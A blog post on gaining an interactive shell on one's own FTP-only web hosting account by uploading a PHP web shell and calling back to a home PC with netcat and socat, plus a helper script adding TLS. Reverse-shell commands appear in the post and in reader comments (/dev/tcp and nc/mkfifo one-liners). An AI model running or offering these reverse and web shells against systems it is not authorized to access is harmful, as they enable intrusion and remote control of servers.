Sometimes you buy web hosting and the only thing you get to control it is an FTP account. For anyone used to unix-like shells it would be really handy to have an SSH session on the account, since that makes maintaining files and permissions much easier, but most web hosts don't offer it.

The first step is to find out whether the host's PHP configuration bans the functions that execute a process: the exec, system and popen family (the banned ones are listed under disable_functions in the output of phpinfo()). You may write your own test or install a PHP script called "PHP Shell". PHP Shell receives shell commands through the web browser, executes them and delivers the output right in the browser window. There are lots of PHP shells out there; I used the one developed by Martin Geisler. Download one of them and upload it using your FTP account.

For simple operations you can get an interactive shell using GNU netcat (note the word GNU: there are lots of other netcat versions and most of them do not support executing a command on connect). Running the following command on your own machine creates a simple TCP listener on a specific port:

netcat -l -p 8999 -v

As you see, we have provided the verbose option to get notified when someone connects to your listener. Then, by running the following line from the PHP shell, we connect to our local listener and receive a shell:

netcat my.pc.ip.address 8999 -e "/bin/bash -i"

The above netcat command connects back to your PC at home and executes an interactive bash shell. At this stage you can type a command and see its output (I call it semi-interactive). Soon you'll notice that special terminal keys such as Ctrl+D, Ctrl+C and the arrow keys don't work as expected: there is no pseudo-terminal on the remote side, bash's stdin and stdout are wired straight to the socket, so nothing turns those keys into signals or line editing.

We'll use socat to overcome this problem. socat can connect almost any two streams you can think of: files to sockets, terminals to UDP connections, process output to TCP connections, and it supports SSL connections too. But it is not installed on most distributions by default, so the first step is to get the source and compile it. We need it both on our local PC and on the web server. The PC part is easy, but for the web server side you should first find out whether the build tools (compiler, make, etc.) are installed there. Test it simply by running gcc and make in your PHP shell. If they are, follow these steps to get it running:

  1. run wget
  2. extract the file using tar -xf socat-
  3. cd socat-1.7.13
  4. ./configure
  5. make

If everything went smoothly you will find the socat binary right under the socat-1.7.13 folder. Note that if your web host doesn't have the build tools installed, you should compile the package locally and upload the binary file; build it for the same architecture and against a libc no newer than the one on the host, otherwise the uploaded binary will refuse to run. The final part is to set up the listener, this time using socat, and connect to it from the web host. Run the following command on your PC to get the listener:

socat file:`tty`,raw,echo=0 tcp-listen:8999

and run this one from the PHP shell to get the terminal (the port must match the listener's, 8999 here):

./socat tcp-connect:my.pc.ip.address:8999 exec:'bash -li',pty,stderr,setsid,sigint,sane

The first socat command connects your current TTY to a TCP socket that is still listening; the second one connects a bash process, started inside a pseudo-terminal (the pty option), to your TCP listener. Now you have a fully functional TTY terminal connected to your account on the web host. Almost all terminal keys work and you can run vim, nano, screen and Midnight Commander 😎 . There are a few differences between an SSH session and this reverse shell. The most important ones are:

  1. Your session is not encrypted, and the listener accepts whoever connects first; use the SSL capabilities of socat.
  2. SSH automatically forwards some useful shell variables and the window size. Set them yourself, or put them in the .bash_profile or .bashrc of the web hosting account, for example
    export TERM="xterm-color"
  3. For convenience, put the second socat command line in a new PHP script so you don't need the PHP shell each time. Either password-protect your PHP shell or delete it when everything is finished, otherwise anyone who finds the URL has your account.
  4. Some web servers run under a different user id than your account, so you won't have permission to create and edit files from the PHP shell. In that situation, creating a world-writable directory (all permissions for everyone) does the job; on a shared host every other account can write there too, so keep it to a scratch directory and remove it when you are done.
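The socat listener and connect commands from the post, wrapped in a small shell script as an added example (this is not the post's own code and not part of socat): it keeps the listener and remote ports in step, restores your terminal settings when socat exits (the raw,echo=0 listener otherwise leaves the terminal unusable if the session drops), offers the encrypted variant from point 1 using socat's openssl-listen/openssl-connect addresses pinned to a self-signed certificate you upload next to the socat binary, and prints the TERM/stty line from point 2 to paste into the new session. The script name, the revtty-* file names, the default port, the function names and the 203.0.113.5 address are my assumptions; it needs socat on both ends and openssl on the local PC for the cert step.

```sh
#!/bin/sh
# revtty.sh: the post's two socat commands as one script, plus TLS and a
# terminal-restore trap.  Added example; file names, port default and
# function names are assumptions, not anything from the original post.
# Needs socat on both ends and openssl on the local PC for "cert".

REV_PORT=${REV_PORT:-8999}          # listener port; must match on both ends
REV_CERT=${REV_CERT:-revtty-cert.pem}
REV_KEY=${REV_KEY:-revtty-key.pem}
EXEC_PART="exec:'bash -li',pty,stderr,setsid,sigint,sane"

# Command for the web-host side (paste it into the PHP shell).
# $1 = your public IP or host name, $2 = port, $3 = tcp (default) or tls.
# In tls mode the remote end checks the listener against the uploaded
# self-signed cert, so someone on the path cannot impersonate your PC.
remote_cmd() {
    case ${3:-tcp} in
        tcp) printf './socat tcp-connect:%s:%s %s\n' "$1" "$2" "$EXEC_PART" ;;
        tls) printf './socat openssl-connect:%s:%s,cafile=%s %s\n' \
                    "$1" "$2" "$REV_CERT" "$EXEC_PART" ;;
        *)   echo "remote_cmd: mode must be tcp or tls" >&2; return 1 ;;
    esac
}

# socat listen address for the local side. reuseaddr lets you restart the
# listener right after a dropped session; verify=0 means the web host does
# not have to present a client certificate.
listen_addr() {
    case ${2:-tcp} in
        tcp) printf 'tcp-listen:%s,reuseaddr\n' "$1" ;;
        tls) printf 'openssl-listen:%s,reuseaddr,cert=%s,key=%s,verify=0\n' \
                    "$1" "$REV_CERT" "$REV_KEY" ;;
        *)   echo "listen_addr: mode must be tcp or tls" >&2; return 1 ;;
    esac
}

# Self-signed certificate for the listener. Upload REV_CERT next to the socat
# binary on the web host. The CN must be the host/IP the remote side connects
# to: socat 1.7.3 and later compare it (or pass commonname=... to override).
make_cert() {
    openssl req -x509 -newkey rsa:2048 -nodes -days 30 -subj "/CN=$1" \
        -keyout "$REV_KEY" -out "$REV_CERT"
}

# Line to run inside the new session: SSH would have forwarded TERM and the
# window size; here you set them yourself so vim/mc/screen draw correctly.
remote_fixup() {
    printf 'export TERM=xterm-256color; stty rows %s cols %s\n' "$1" "$2"
}

# Start the listener. The post's "file:`tty`,raw,echo=0" puts your terminal
# in raw mode and nothing resets it if socat dies, so save the settings first
# and restore them on any exit.
listen() {
    mode=${1:-tcp}
    addr=$(listen_addr "$REV_PORT" "$mode") || return 1
    saved=$(stty -g)
    trap 'stty "$saved"; trap - EXIT INT TERM' EXIT INT TERM
    echo "listening on $addr; on the web host run:" >&2
    remote_cmd "${PUBLIC_HOST:-my.pc.ip.address}" "$REV_PORT" "$mode" >&2
    socat "file:$(tty),raw,echo=0" "$addr"
}

case ${1:-} in
    cert)   make_cert "${2:?host or IP for the certificate CN required}" ;;
    listen) listen "${2:-tcp}" ;;
    remote) remote_cmd "${2:?host or IP required}" "${3:-$REV_PORT}" "${4:-tcp}" ;;
    fixup)  remote_fixup "$(tput lines)" "$(tput cols)" ;;
esac
```

Usage: `PUBLIC_HOST=203.0.113.5 ./revtty.sh cert 203.0.113.5` once, upload revtty-cert.pem and the socat binary over FTP, run `./revtty.sh listen tls` on the PC, paste the printed `./socat openssl-connect:...` line into the PHP shell, and once the prompt appears paste the output of `./revtty.sh fixup`. Plain mode works the same with `listen` and `remote <host>` without the tls argument, but then anyone who can reach the port gets to talk to your terminal first.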


7 Responses to “Get Your Interactive Reverse Shell on a Webhost”

  1. AbiusX Says:

    nice blog btw dude

  2. zero?yuki Says:

    nice tutorial, but some things are missing

  3. [Pentesting] Établir un reverse-shell en une ligne Says:

    […] Blog […]

  4. digital options Says:

    I have been exploring for a bit for any high-quality articles or weblog posts on this kind of area. Exploring in Yahoo I finally stumbled upon this site. Reading this information, so I am happy to exhibit that I've an incredibly good uncanny feeling I found out just what I needed. I such a lot no doubt will make certain to don't fail to remember this site and give it a look on a continuing basis.

  5. anon Says:

    I don’t normally comment on these, but… Thank you.

  6. reptar Says:

    who even still has a netcat with the -e option?

    here’s some reverse shell one-liners from my collection:

    bash -c 'exec 3<>/dev/tcp/$YOUR_IP/$PORT; bash <&3 >&3 2>&1 &'
    mkfifo /tmp/pipe; nc $YOUR_IP $PORT < /tmp/pipe | /bin/sh > /tmp/pipe 2>&1 &

  7. reptar Says:

    wow, ignore the above, a lot of it got filtered out by your comment sanitizer (probably looked like HTML)

    I'll try them again, replace the } with > and the { with < for them to work

    bash -c 'exec 3<>/dev/tcp/$YOUR_IP/$PORT; bash <&3 >&3 2>&1' &
    mkfifo /tmp/pipe; nc $YOUR_IP $PORT < /tmp/pipe | /bin/sh > /tmp/pipe 2>&1 &
